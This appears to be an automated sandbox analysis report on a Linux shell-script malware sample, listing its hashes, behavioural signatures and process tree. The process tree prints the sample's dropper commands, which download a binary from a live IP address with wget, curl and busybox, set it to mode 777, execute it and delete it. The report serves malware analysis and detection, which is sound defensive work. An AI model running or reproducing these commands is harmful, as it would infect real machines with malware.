Analysis
-
max time kernel
22s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
28/10/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
-
Size
10KB
-
MD5
22f4216f3ccd3bd3da6abc07872ed694
-
SHA1
a8a8f0e68a4e021880b294c0ea1a5b5d771b2cfa
-
SHA256
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4
-
SHA512
5d2853a61c5cd7ab892aa41605cc6b8826c8c2ed15992aa7ba4dabefc73abc788984183ff8c5290401418b5567559486f6dd87e620a151cffa95ea7ffb31d3c3
-
SSDEEP
192:0D8ANuGrOy9GmNLkmCFO3HeVlhz3HeVlh0f8ANuGVOy9GmV:C8ANuGrOy9GmNLkmCFF8ANuGVOy9GmV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh: /tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh (PID:1512)
-
  /bin/rm: /bin/rm bins.sh (PID:1513)
-
  /usr/bin/wget: wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1514)
-
  /usr/bin/curl: curl -O http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1518)
    Writes file to tmp directory
-
  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1519)
-
  /bin/chmod: chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1520)
    File and Directory Permissions Modification
-
  /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP: ./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1521)
    Executes dropped EXE
-
  /bin/rm: rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID:1522)
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97